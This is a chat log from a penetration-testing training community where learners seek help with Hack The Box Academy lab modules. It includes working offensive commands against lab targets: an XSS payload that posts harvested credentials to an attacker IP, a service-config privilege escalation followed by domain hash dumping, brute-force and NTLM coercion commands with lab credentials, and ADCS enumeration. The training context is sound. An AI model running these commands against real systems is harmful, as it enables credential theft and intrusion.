#modules

1 messages · Page 347 of 1

solar condor
#

hey guys I have a problem in Exploiting Web Vulnerabilities in Thick-Client Applications section in attacking common applications module, it's been months and I have the same problem that is there is no button to open

tender nimbus
#

mb didn't knew that you just can copy past an exe file -_-

dapper moth
empty trout
#
rough comet
#

Hi folks

#

I finished the "Credentialed LDAP Enumeration" module.

#

But I will admit, I solved some of the userAccountControl questions via AI

#

Is there any good site or blog where I can learn more about custom ldap queries?

#

Like this stuff: --custom "(&(userAccountControl:1.2.840.113556.1.4.803:=512)(userAccountControl:1.2.840.113556.1.4.803:=128))"

fathom pendant
#

Htb wasn't always a .com website

fathom pendant
grizzled mantle
#

Happy diwali

#

To all of you

storm elk
#

Same to you, but please verify your account Please read #welcome and #rules it will explain how to get verified

signal sapphire
#

I am a new member

signal sapphire
storm elk
grizzled mantle
#

@storm elk bro rule kafi long hai

storm elk
grizzled mantle
#

Rule is to long

signal sapphire
#

Can anyone explain how to be become a ethical hacker

compact patrolBOT
grizzled mantle
#

@signal sapphire anyone also help me

fading olive
#

Hello, doing File Inclusion > Skills Assessment. I have found the hidden admin page : ||http://94.237.62.166:40163/?page=ilf_admin/index|| however the page doesn't display correctly. There's squares all around and all the text is in just one long string, nothing gets displayed. Whenever I click on one of the logs, it just brings me back to the main page. I thought it might have been my network but it's the same on the PwnBox too. And I tried restarting the target but it doesn't change anything. Can anyone help me understand what's going on?

rough comet
#

Also, should I sping my wheels on that? I know we can get some useful stuff via Bloodhound. Not sure how valuable would be, learn more about ldap custom queries, especiall when we can use AI.

#

Someone can correct me if I am wrong.

dapper moth
#

Hey, @storm elk
have you done the advanced deserialization module?

fathom pendant
indigo rune
#

Most people think whenever an IP Address changes, it is a proxy, and in most cases, it's probably best not to correct them as it is a common and harmless misconception. Correcting them could lead to a more extended conversation that trails into tabs vs. spaces, emacs vs. vim, or finding out they are a nano user.

I love finding these things in the modules

empty trout
fathom pendant
empty trout
#

i did google but nothing found maybe i am a noob at osint

#

tell me

fathom pendant
#

I literally told you; HTB is an EU based company

#

Think about what tld would correlate to thay

tawny solar
#

Is any one solving now CDSA?

empty trout
full wagon
#

Someone? 😊

dapper moth
# storm elk Yes I have.

Can I DM you for a few pointers on the XML section?
Can’t figure if I’m setting the type wrong or something

storm elk
dapper moth
dim wolf
trail sail
#

Can someone please help me with a nudge to find the open button?
Module: Attacking Common Applications.
Section: Exploiting Web Vulnerabilities in Thick-Client Applications.
Problem: I can't find the open button in the java app..

median warren
#

hello i have buy gold subscription and wait more then 10m and still i cannot access any modules

shut quest
#

did you purchase gold annual? which unlocks up to tier 3, or did you purchase gold monthly which only gives you 500 cubes?

median warren
#

really?! i just buy monthly

rustic sage
#

can anyone help me with a nudge on kerberos attacks skills assessment last question
i have creds of an** but not able to rdp on ||SERVER01||

median warren
#

student can access all tier 2 modules and gold cannot access anything what a shit logic!!!

cloud urchin
#

not really, students often time have discounts on learning resources so it kinda makes sense to me

shut quest
#

the silver/gold/plat give 200/500/1000 cubes a month
student is up to tier 2, similar to how the silver/gold annual work

median warren
#

im student btw, but its not clear when u giving student full access tier 2 and gold have only 500cupes.

shut quest
#

if you are a student, confirm your email and get the student monthly for $8/m and have up to tier 2 unlocked

median warren
#

i dont want tier2 i want tier3. anyway if i sent an email and not used the cupes can i got my money back?

shut quest
#

you'll want to reach out to support

compact patrolBOT
shut quest
#

the package you're looking for instead would be the gold annual

jovial cliff
#

which flag did you use to get the full TCP three-way handshake?

median warren
#

anyway thanks bro.

shut quest
#

np

brazen plover
#

Hello, good evening, can someone help me with NoSql Assessment II? I'm stuck hehe, I got a hash but I can't break it, can anyone tell me if this is the way?

#

||I found a nosql time based on login and I can't list another user besides bmdyy, so I managed to get his password hash and I got stuck||

acoustic owl
#

Look for another possibility besides cracking the password.

trail sail
brazen plover
#

@acoustic owl can i dm you?

brazen plover
visual vault
#

Can we have an android related module please?
Something to cover the history and methods of exploiting mobile devices
For example older androids had a vulnerability that allowed someone to gain access to their config file and give themselves unlimited wrong password attempts and brute force their way in which is patched in newer androids but knowing the history wouldn't hurt
Also include android based malwares and AV evasion methods on android and so on.
Would be cool to have it

runic rampart
#

Friends, could you please tell me, in the MSSQL, Exchange, and SCCM Attacks: Skills Assessment, after completing the second-to-last task, I got the final flag without any effort. Was it meant to be this way?

dapper moth
cerulean hinge
#

Hello, may I get some help for the Credential Hunting in Linux part of the password attacks module ?
I did try to perform a brute force attack over ftp using the provided list but nothing worked... Is this the correct way to gain an ssh access ?
Even the "Help" didn't really help me...

cloud urchin
#

did you try the mutated list?

cerulean hinge
#

Yes I did use the custom.rule on the password.list

cloud urchin
#

rules are different than the password list

cerulean hinge
#

I mean I did use the custom.rule file and applied them to the password list

cloud urchin
#

so you didn't use the mutated password list then?

cerulean hinge
#

which mutated password list ? I only got 2 list (user & password) and a .rule file

#

the password list I used come from this command : hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

cloud urchin
#

oh yeah sorry was thinking of something else maybe.. hard to say from my notes. yeah that looks right.

#

right so that's the mutated list

cerulean hinge
#

I did try on ftp as it is quicker than ssh

#

I used both cme and msfconsole (ftp_login module)

cloud urchin
#

i used hydra

cerulean hinge
#

I will try it

#

on ftp or ssh ?

cloud urchin
#

generally you don't want to attack ssh unless specified, it's tough to brute ssh

cerulean hinge
#

yes it's why I did cme & msfconsole on ftp...
But also the hint gives the password & username but even with that I can't ssh into the machine... This is weird. I don't know if i'm dumb or what at this point xD

#

I will try to reset the machine before performing the brute force with hydra. Thank you for your help

dusk crater
#

guys a quicly question

#

i get this error whent i run crackmapexec
"bash: cme: command not found"

#

how can i fix it?

dim wolf
#

do you have [netexec] installed?

#

it's a fork of cme that's actively maintained

fathom pendant
#

On pwnbox there was an official changeover

cloud urchin
fathom pendant
#

cme was archived ~1yr ago anyway, and is no longer maintained

#

Even longer probably

dusk crater
dusk crater
dim wolf
cloud urchin
dusk crater
#

ok it works

#

thank you

grand loom
#

if i add myself to the Administrators
group does that mean i have full access on the DC?

or is that just the administrator on that local computer?

cloud urchin
#

depends on which administrator's group. any group can have the powers of a domain admin. if we're going with default settings, it sounds like only a local admin.

grand loom
cloud urchin
#

i don't want to vc

#

just check the groups to see if it's local or not

grand loom
# cloud urchin just check the groups to see if it's local or not

sure let me explain further: The server operator group is able to log in locally to servers, including Domain Controllers.

In the Windows Privilege Escalation module they did C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" Which was to add the current user to the administrator group, and from there they then did
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator

So my questions are, is this administrator group of the local DC?

If it is would they give you acess to the domain controller? if not would this command be better cmd /c net group "Domain Admins" user /add /domain

Like im confused how they were able to dump the hashes when wouldnt this be the local administrator group of the server.

sorry if this is a dump question

cloud urchin
#

yeah net localgroup is a command for local groups, not domain groups

grand loom
cloud urchin
#

right, that would only give you local admin to the DC not domain admin

#

but if you have some kind of exploit that can run commands to privesc, you can modify it to do other things

grand loom
#

also could the same hash dumping be achieved if added to the domain admin group like using cmd /c net group "Domain Admins" user /add /domain

cloud urchin
#

probably but you'd have to test

grand loom
grand loom
# cloud urchin probably but you'd have to test

oh shit last question on this, ik this is stupid but , so if im becoming a local admin on the DC and can then dump the hashes. This means as server operator which can log in locally to servers, including Domain Controllers. I **must **login to DC and use this exploit specifically on the DC. to join specifically its local admin group so i can dump hashes.

cloud urchin
#

English only server sorry

cloud urchin
grand loom
vagrant wraith
#

Hi guys i wanted to know the diff when fuzzing a url vs lents say i just dont understand what fuzzing a wordlists is for example FUZZ vs :FUZZ

#

i hope it makes sense

cloud urchin
#

sounds like you're talking about ffuf

vagrant wraith
#

yeah

#

i just dont get :FUZZ part

cloud urchin
#

that's just a wildcard to tell ffuf to fuzz with a wordlist and where to fuzz

vagrant wraith
#

i see thanks man

cloud urchin
#

wordlist.txt:FUZZ, this tells ffuf to use "wordlist.txt" to iterate through the list where you put the "FUZZ" wildcard, so ffuf -w wordlist:FUZZ -u http://fuzz.htb would fuzz the "fuzz" part of http://fuzz.htb

vagrant wraith
#

like it recurves ?

cloud urchin
#

i think you can change the wildcard and have multiple of them, so you could do ffuf -w wordlist:BUTTS -u http://BUTTS.htb and get the same result

dapper moth
cloud urchin
#

it just tells ffuf to use the chosen wordlist in the specific location

dapper moth
#

The Cicada (easy) box was a good example of this.

vagrant wraith
#

ill research more about it thanks

cloud urchin
# vagrant wraith like it recurves ?

you can also do multiple wildcards like this ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://localhost:3000/login -fc 200

trail sail
rustic sage
#

Hello fellow hackers

cloud urchin
shut quest
quasi wave
#

hi I'm doing Linux credential hunting. Hydra won't give me a password for will or kira

#

and I have the usernames list but brute forcing both that and the password list would take forever

#

and I could do that but I don't know if that's a good approach

#

this is for the Linux Credential Hunting section of Password Attacks module

#

am I doing the right thing by brute forcing the usernames and passwords both?

#

I have a usernames list and a passwords list from the resources section

#

hydra never finds anything and I'm unsure if trying every username/password combo using the username list and the password list separately is a smart idea or if I'm going in the wrong direction

stable jasper
#

if i remember good try with Kira or kira

quasi wave
#

and same thing with Will and will

#

and brute forcing it with both username list and password list is taking a million years

stable jasper
#

you need to adapt the list with the hint provided

quasi wave
#

ok

stable jasper
#

tell me if you still need help

quasi wave
#

I'm at party so gonna sleep on it try again tomorrow

#

now that I know hydra is the right way to go

stable jasper
#

👍

acoustic owl
acoustic owl
pseudo kiln
#

AD Enumeration and Attacks, Section Bleeding Edge vulnerabilities. They mentioned this

Let's walk through the attack. First off, we need to start ntlmrelayx.py in one window on our attack host, specifying the Web Enrollment URL for the CA host and using either the KerberosAuthentication or DomainController AD CS template. If we didn't know the location of the CA, we could use a tool such as certi to attempt to locate it.

Anyone knows how to use this tool to locate this ? No idea how to actually find the location of the CA
https://academy.hackthebox.com/module/143/section/1484

midnight galleon
pseudo kiln
# midnight galleon certi.py find -d <domain> -u <username> -p <password>

like this ? I cloned it from the github repo they mention there

kali@kali:~/Downloads/Support/certi [01-11-2024 10:46]$ ./certi.py find -d support.htb -u guest -p ''
usage: certi.py [-h] {list,req} ...
certi.py: error: argument command: invalid choice: 'find' (choose from 'list', 'req')
                                                                                                                                                                                             
kali@kali:~/Downloads/Support/certi [01-11-2024 10:47]$ ./certi.py -h                                
usage: certi.py [-h] {list,req} ...

positional arguments:
  {list,req}

options:
  -h, --help  show this help message and exit
                                                                                                                                                                                             
kali@kali:~/Downloads/Support/certi [01-11-2024 10:47]$
pseudo kiln
#

yeah, tried a few more things and it shows this, I guess you cannot enumerate it without credentials, even though petitpotam works without any creds

kali@kali:~/Downloads/Support/certi [01-11-2024 10:57]$ ./certi.py list --dc-ip 10.129.230.181 support.htb/guest
Password:
Traceback (most recent call last):
  File "/home/kali/Downloads/Support/certi/./certi.py", line 5, in <module>
    certilib.main()
  File "/home/kali/Downloads/Support/certi/certilib/main.py", line 245, in main
    return main_list(args)
           ^^^^^^^^^^^^^^^
  File "/home/kali/Downloads/Support/certi/certilib/main.py", line 450, in main_list
    templates = list(fetch_templates(
                ^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Downloads/Support/certi/certilib/main.py", line 651, in fetch_templates
    resp = search_ldap(
           ^^^^^^^^^^^^
  File "/home/kali/Downloads/Support/certi/certilib/ldap.py", line 69, in search_ldap
    return ldap_conn.search(
           ^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 402, in search
    raise LDAPSearchError(
impacket.ldap.ldap.LDAPSearchError: Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
                                    
tranquil axle
#

you can try passing "empty" creds for anonymous bind, might not work all the time though

pseudo kiln
#

hmmm, how would you do that though ? for me the tools seems to want to take in a username no matter what

tranquil axle
#

-u "" -p "" does not work?

pseudo kiln
#

like this ?

kali@kali:~/Downloads/Support/certi [01-11-2024 10:57]$ ./certi.py list -d support.htb -u '' -p ''              
usage: certi.py list [-h] [--dc-ip IP] [-k] [-n] [--class [{template,ca,service,ntauth} ...]] [--aes hex key] [--enabled] [--vuln] [--temp-name TEMP_NAME [TEMP_NAME ...]]
                     [--temp-filter TEMP_FILTER] [--hashes LMHASH:NTHASH] [--ssl]
                     target
certi.py list: error: argument target: Domain of user 'support.htb' should be be specified
tranquil axle
#

I'm a little lost, looking at github "list" doesnt even seem to be a valid command?

pseudo kiln
#

it is, according to the help menu at least

kali@kali:~/Downloads/Support/certi [01-11-2024 11:02]$ ./certi.py list -h                                    
usage: certi.py list [-h] [--dc-ip IP] [-k] [-n] [--class [{template,ca,service,ntauth} ...]] [--aes hex key] [--enabled] [--vuln] [--temp-name TEMP_NAME [TEMP_NAME ...]]
                     [--temp-filter TEMP_FILTER] [--hashes LMHASH:NTHASH] [--ssl]
                     target

positional arguments:
  target                domain/username[:password]

options:
  -h, --help            show this help message and exit
  --dc-ip IP            IP address of domain controller
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -n, --no-pass         don't ask for password (useful for -k)
  --class [{template,ca,service,ntauth} ...]
                        Classes to retrieve
  --aes hex key         AES key to use for Kerberos Authentication (128 or 256 bits)
  --enabled             Show only templates that are used by some enroll service
  --vuln                Show only templates with vulnerable configurations
  --temp-name TEMP_NAME [TEMP_NAME ...]
                        Request only template with the given name
  --temp-filter TEMP_FILTER
                        LDAP filter for templates
  --hashes LMHASH:NTHASH
                        LM and NT hashes, format is LMHASH:NTHASH
  --ssl                 Use LDAPS instead of LDAP
tranquil axle
#

oh I'm looking at the windows one wops

pseudo kiln
#

yeah, it's really confusing hence why they should have included it in the module....

knotty anvil
#

maybe try certipy-ad

tranquil axle
#

you can try netexec/crackmapexec too crackmapexec ldap 172.16.117.0/24 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -M adcs

#

I assume you'll need creds anyway to abuse it in the end

knotty anvil
#

certipy-ad find -u '' -p '' -target sequel.htb -text -stdout -vulnerable

pseudo kiln
#

well that's the thing petitpotam it's supposed to not need credentials

pseudo kiln
pseudo kiln
# tranquil axle you can try netexec/crackmapexec too `crackmapexec ldap 172.16.117.0/24 -u 'plai...
kali@kali:~/Downloads/Support/certi [01-11-2024 11:05]$ nxc smb DC -u guest -p '' -M adcs                   
[-] Module ADCS is not supported for protocol smb
                                                                                                                                                                                             
kali@kali:~/Downloads/Support/certi [01-11-2024 11:07]$ nxc ldap DC -u guest -p '' -M adcs
SMB         10.129.230.181  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP        10.129.230.181  389    DC               [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.129.230.181  389    DC               [+] support.htb\guest: 
ADCS        10.129.230.181  389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.129.230.181  389    DC               [-] Obtained unexpected exception: Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
tranquil axle
#

is the lab just messed up lol

pseudo kiln
#

it's not for a lab, in the module, it's against a random machine on the site. Just trying to apply the module knowledge. They say you can identify the enrollment part with this certi tool, but it does not seem to be the case. They could have covered it imo, considering ADCS is not really an easy thing to mess with

pseudo kiln
# knotty anvil smb > ldap
kali@kali:~/Downloads/Support/certi [01-11-2024 11:09]$ nxc smb DC -u guest -p '' -M adcs                                    
[-] Module ADCS is not supported for protocol smb

sadly does not seem to support it

knotty anvil
# pseudo kiln ``` kali@kali:~/Downloads/Support/certi [01-11-2024 11:09]$ nxc smb DC -u guest ...
pseudo kiln
#

yep I know, it's not about the box, it's about the tool they tell you to use

dawn bloom
#

I'm on the web attacks module, http verb tampering section (basic auth bypass). This command curl -i -X OPTIONS http://IP:PORT should show me the available methods the web app accepts, but is not showing me anything

fickle bison
#

was the crackmapexec module skills assessment updated?

dawn bloom
#

I was able to get the flag by sending random methods, but that command right there should return de Allow header showing me the allow methods, right?
Just like the module explains

midnight galleon
#

AD enum & attacks - kerberoasting from windows

I know the module said

Now that we have seen the older, more manual way to perform Kerberoasting from a Windows machine and offline processing, let's look at some quicker ways. Most assessments are time-boxed, and we often need to work as quickly and efficiently as possible, so the above method will likely not be our go-to every time. That being said, it can be useful for us to have other tricks up our sleeves and methodologies in case our automated tools fail or are blocked.

but if Rubeus is blocked, won't mimikatz also be blocked?

#

like, idk but mimikatz feels more famous than Rubeus

next stone
#

I need help with Whitebox Attacks Type Juggling Authentication Bypass
If anybody have completed that and sees this message, please let me know.

next stone
#

The type juggling, can't exploit it on the login endpoint

#

if (pw_hash($data['password']) == $user['password'])

#

According to the module if you send a password value 0 it should match the admin user's magic hash which starts with 0e....

analog dock
#

There’s multiple payloads given in that section iirc

next stone
#

but this doesn't works for me!
I tried a value which it's sha-256 hash will start with 0e (34250003024812) but still no luck

analog dock
#

The hint I’ll give is brackets

next stone
#

The endpoint accepts JSON are you sure that i still can use the [] here?

#

@analog dock for type juggling?

analog dock
#

Yes

dapper moth
rustic sage
#

Getting Started module: Last Check
I have user privilege at the machine, I competed the LinEnum scan in the reverse shell it shows me this:

When I'm trying to run the command It says: permission denied

rustic sage
dapper moth
#

Also.... The sudo is for running binaries in a "super user" context, not writing inside the directory.
So, try to write the WebShell in a directory that you are allowed to write, then run whatever binary as root

calm abyss
rustic sage
#

@dapper moth I'm lost, I don't really understand what to do. If you can please hop in the voice to me.

dapper moth
#

Just have to adapt to the output you got

brazen plover
#

Good morning guys, could someone give me a light on NOSQLI skill assessment II?

signal glen
#

Hi guys, I'm doing the penetration tester path and in the metasploit module of "sessions" I have to use metasploit to exploit elfinder. One of the questions is as what user you are logged in now. I tried "meterpreter> shell" but for some reason it's broken. And I know I can just use "getuid" command instead but the walkthrough is using meterpreter> shell, and I believe I had problems with this command yesterday as well, but didn't think much of it.

meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

#

Does anyone know what I should check?

brazen plover
#

Nevermind I think I got it

cobalt aspen
#

Module: Cross-Site-Scripting (XSS)
Section; Phishing
||'> <script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.196:8080/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <!--|| im confused why this payload doesnt work, tried to send it like this, then url encoded. am i missing something or what? it just keep saying invalid url

quick eagle
#

Good morning! I am on Identifying SSRF module and having hard time finding the flag. I found some open ports with ffuf but when I can’t browse them. Any hints please?

final shale
cobalt aspen
#

yeah

signal glen
signal glen
urban elk
#

I'm about to go through the same section same module, and just updated my parrot VM. Might have the same problem, will let you know

signal glen
signal glen
urban elk
signal glen
urban elk
#

does it match the version on the bug report ? Framework: 6.4.32-dev-

#

or higher, I suppose

signal glen
#

pwnbox is on 6.3.44

urban elk
#

I'm on 6.4.44-dev-, so I guess I'll be affected too. Let's see

signal glen
quick eagle
azure sonnet
#

Hallo, I can't figure out how to do the login brute force skill assessment 2. I have used username-anarchy to create a list of usernames for Thomas Smith and then used the passwords.txt file for my passwords. However, when I run this Hydra command, it can't find any combinations: hydra -l thomas -P passwords.txt -f ftp://83.136.253.249 -v. and when i try to run medusa it cant connect to port 21. If anyone has any ideas on what I might be doing wrong, please let me know

urban elk
signal glen
boreal cypress
#

Anyone got any ideas on the WI-fi penetration testing basics module, cant seem to understand what "locate the flag at <ip_address> wants me to do> Connect to the WPA Wi-Fi network named "CyberNet-Secure" with the PSK "Password123!!!!!!". Once connected, locate the flag at the IP address 192.168.1.1.

urban elk
signal glen
urban elk
#

oh wait, the issue is closed actually! It was so recent that I assumed it was still open

#

so I guess my version is patched already (hard to confirm quickly with their versioning convention, but I guess that's it)

dapper moth
#

Figured
Now just stuck at the SA sadglas

boreal cypress
final kite
#

javscript deobsfucation skill assesment As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.

#

i found the code and put it together

#

and flag but i doesn't acccept for somer reason

#

nvm got it

shut wraith
#

Hello. Sliver Module, first lab. Cannot get upload attack to work. After uploading stager, I go to the link of upload and it shows error:

Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".


<!-- Web.Config Configuration File -->

<configuration>
    <system.web>
        <customErrors mode="Off"/>
    </system.web>
</configuration>


Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.


<!-- Web.Config Configuration File -->

<configuration>
    <system.web>
        <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
    </system.web>
</configuration>
surreal beacon
#

is there anyone near the information gathering module ?

surreal beacon
#

its in information gathering/digging DNS
ive tried every single command possible but its not working .. so its either a glitch or theres something stupid happening

gray yacht
tacit bay
#

Anyone able to help me out - doing the sliver module, I've got an interactive SYSTEM shell, I can run "hashdump" no problem, but when I try and use the "execute" function for arbitrary things (such as "whoami" or "schtasks /query" with the --output flag enabled) I get an exit code of "3221225794" - when I run it as the administrator account, works fine..

surreal beacon
#

regarding my question, i just figured out they updated the module so nevermindLUL

wide moth
#

Hi, who can give me a hint in Advanced SQL Injection Skill assessment (RCE)? It seems that CREATE function doesnt work

tacit bay
# dapper moth section

just after 'Privilege Escalation' - its not part of any questions, I'm just wanting to play around with sliver more as im new to it..
Example screenshot:

cerulean hinge
#

Hello,

I'm currently stuck at the question : Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
Module : Password attacks
Chapter : Pass The Hash

I did try to use smbclient & smbclient.py and I manage to connect to the shared folder however there is no DC01 folder.
I tried to perform a scan to enumerate shares on a /24 to see if maybe another host was up using cme but didn't get any result.

Can I have a hint please ?

cerulean hinge
#

oh I understood now I have to do it from the MS01 machine. It's why I don't see any other IP with my kali I guess ? Thank you !

iron oar
#

For ntlm relay module anyone know why I would get "NO_AUTH_RECEIVED" from coercer for every request when I double checked creds and responder is running?

#

(am getting same response when scanning)

rustic sage
#

Guys

#

Ok having a problem with metasploit

#

So basically I'm Ubuntu, I used the command sudo snap install metasploit framework, then I did msfconsole and I got a text saying that it's more than 2 weeks old and I should do msfupdate

#

Then I do msfupdate and it says it's not supported and I should do sudo snap refresh metasploit-framework

#

And after I do that it tells me metasploit framework has no available updates

#

And then I do msfconsole and it tells me again metasploit framework needs to be updated

#

What do I do? I'm trying to use eternal blue exploit and it keeps failing

urban elk
#

how does it fail ?

iron oar
#

the snap package is probably just not updated

#

but that is also unrelated to eternal blue exploit failing

dapper moth
rustic sage
#

Over and over again

urban elk
#

do you have to use eternalblue ? I've always had (far) more luck with the psexec exploit for the same issue

rustic sage
#

Why is it not working

urban elk
#

which module/section ?

rustic sage
#

Shells and payloads infiltrating windows

urban elk
#

"Since I have had more luck with the psexec version of this exploit, we will try that one first. Let's choose it and continue the setup."

dapper moth
iron oar
dapper moth
#

Depends on the type of auth the Host accepts

iron oar
#

questions ask your to run against .60

dapper moth
#

Have you tried:
python3 Coercer.py -t 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -wh SUPPORTPC2 -wp 80 -v?

iron oar
#

ah no I didnt try using 1.6/webdav

#

let me spin it back up

dapper moth
#

Might be the problem:
Coercer has the --auth-type option that allows us to specify either http or smb, depending on the type of NTLM authentication we want to coerce; however, unfortunately, all 2.* releases of Coercer cannot successfully coerce HTTP NTLM authentication on hosts with WebDAV enabled (the tool only can coerce SMB NTLM authentication). Regardless of offering fewer methods compared to 2.* releases, release 1.6 successfully coerces HTTP NTLM authentication.

shut wraith
#

On AD Module how come I ping hosts and find 245 last month, and this month I can only find 224 ?

shut wraith
#

How to ping unpingable hosts which are still up ?

rustic sage
#

It still times out tho

#

@shut wraith I remember u

#

U were in the Muslim discord

shut wraith
#

Yeah Im still there

#

Asalamulaikum

#

Jummah Mubarak

urban elk
quick eagle
# gray yacht Are you on the skills assessment?

no I am trying to answer this question 'Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag' in SSRF module but cant browse that internal web with the ports I found.

rustic sage
rustic sage
#

Jummah Mubarak

shut wraith
urban elk
shut wraith
#

When I did the eternal blue box, I used 3 terminal tabs to spam the exploit at the target, maybe 1 works

#

If doesnt -- reset the box and try again

iron oar
rustic sage
dapper moth
iron oar
#

beast, yeah I've moved on, u can assume the module answers thankfully but I think this section might just be broken for me at least

rustic sage
#

@urban elk worked

urban elk
#

cool! I'm glad, what changed ?

rustic sage
#

Htb vpn

midnight galleon
fathom pendant
#

It's internal to the MS01 network (172.16.x.x)

spring pendant
#

who can help with Advanced XSS and CSRF Exploitation Skills Assessment?

spring pendant
# cloud urchin what's up

I listed all the customers and found a customer
but I don't know what to do next.
I texted you what I found in dm

lime wagon
#

Hello Everyone! I hope you all had a wonderful week! I have a question about connection issues. I was running through the "Getting Started" (Public Exploits) module, but I keep running into errors while enumerating the target IP. The particular one I am seeing now is a EOF error with gobuster. I also can not get feroxbuster to connect either. I identified ||wordpress|| on the target so, I tried ||wpscan|| again it says the site is down... It clearly is not. Just wonder if there is a setup issue I am running into.
Yes, I am connected to the VPN

spring pendant
gray yacht
rustic sage
#

Yo

#

How do I install metasploit in Ubuntu without snap

#

I am trying to add an exploit to metasploit but it says snap is read only

#

I tried removing it and installing again with the -classic flag but it still says it's read only

rustic sage
#

I have it installed

#

I cant write in the exploits directory bc it says it's read only

#

But I did install metasploit multiple times

shut quest
#

use sudo?

rustic sage
#

It doesn't work?

cinder dust
#

Could someone be kind enough to help me with Login Brute Force, Login Forms? For the question it asks me to successfully brute force and login into the target, which I did, but I cannot find the flag in the html document

patent obsidian
#

hello could you help me, I'm trying to configure the wagger with the ip that gives me the HTB api module and I can't figure out how to do it.

shut quest
# rustic sage It doesn't work?

you should try explaining what you are actually wanting then, you first said install without snap, then you're saying you already have it installed, but now you want to add plugins. You should be able to sudo touch /dir, if not do it as root.

shut quest
cinder dust
#

I see, thanks!

tacit bay
#

i have googled that error code a bit, but unsure if someone else has faced a similar issue specifically within sliver

quick eagle
gray yacht
spring pendant
#

who can help with Advanced XSS and CSRF Exploitation Skills Assessment?

severe orchid
#

For the Introduction ot Network Traffic Analysis Module - Fimiliarity with Wireshark section. Where are we supposed to run WireShark in the Pwnbox? I can start Wireshark but I cannot see the eth0 interface listed in Wireshark.

OR

Are we supposed to run Wireshark our local desktop? Thanks for your help

cloud urchin
#

Doesn't matter where you run it as long as you can open the pcap file if i recall correctly

severe orchid
#

OK cool thanks.

iron oar
dapper moth
trail sail
#

Is the site undergoing maintenance? It keeps disconnecting me from the target's IP.

rustic sage
#

Yo

#

So I'm on shells and payloads, laudanum

I edited my /etc/hosts in Kali, downloaded shell.apx and I put my IP address in it, then I went to status.inlanefreight.local and I uploaded the file. It's not telling me the directory of the file and when I go to status.inlanefreight.local//files/file.aspx it gives me error 404

#

I tried a new IP for the box multiple times and I changed my vpn too

#

Idk what going on

urban elk
#

it's weird that it's not telling you the directory, but did you use backslashes as instructed ?

rustic sage
urban elk
#

in url

rustic sage
#

Ye ye I tried everything

woeful lake
#

Hi guys, im in the module information gathering - web edition.
Third question about getting the api key in the hidden directory, i already did vhost, fuzz with multiple dicctionary and tools but nothing

rustic sage
# urban elk in url

I also tried to upload antak.aspx in the next room but it still doesn't tell me the directory. It doesn't even tell me if it's uploaded but I don't think it is

urban elk
#

that's odd. So you pick the file, you hit Upload file, and after the page refreshes you don't have the same feedback at the bottom of the page, as shown on the screenshot ?

rustic sage
#

Hit upload and just see on the bottom left the url of the upload page

#

For like half a second

#

And then I go to the url where the file should be and it shows me the search engine results of the page if I use the //file directory

#

Otherwise it gives me error 404 if I use anything else

urban elk
#

ok the url disappearing is weird, but are you sure you've tried "\files\file.aspx" ? As opposed to //

#

ugh, the double backslash is escaping... so it's double backslash before files

#

\\files\file.aspx

rustic sage
urban elk
#

that's normal, but it should load the webshell

rustic sage
#

No it's giving me error 404

urban elk
#

are you sure your IP is correct on the allow list of the webshell ? Again, the VPN (tun0) IP

rustic sage
#

Like I got shells from different modules with that ip

#

Also the antak.aspx doesn't even ask me for the login credentials : (

urban elk
#

I'm afraid I don't know what else could be wrong, sorry 😦

rustic sage
#

Np

#

Thx

urban elk
#

anytime, I hope you figure it out or someone else has a clue

winter schooner
woeful lake
winter schooner
# rustic sage Thx

Can you send me the link for the specific question, i did it before , and had the same issue but cant remember. So let me see that question again and ill help.

winter schooner
woeful lake
#

Deafult, i think it is 10

winter schooner
woeful lake
#

But with that hint is enough, meaby im doing something wrong

#

I will dm you if needed, i want to try first, ty.

winter schooner
small sage
#

Module: API Atacks
Section: Broken Object Level Authorization

stuck on the second bola exploit, hint says to target the ||/api/v1/suppliers/quarterly-reports/{ID}|| endpoint, I feel like I'm missing something because I get 403 forbidden since my credentials don't have the required role

gray yacht
small sage
supple meteor
#

Can someone help me in AD enum & atk - skill assessment 1 ?
I wanna upload chisel.exe to Windows web shell, however I can't find any chisel.exe package online, instead there's chisel_1.9.1_windows_amd64.gz on Github.
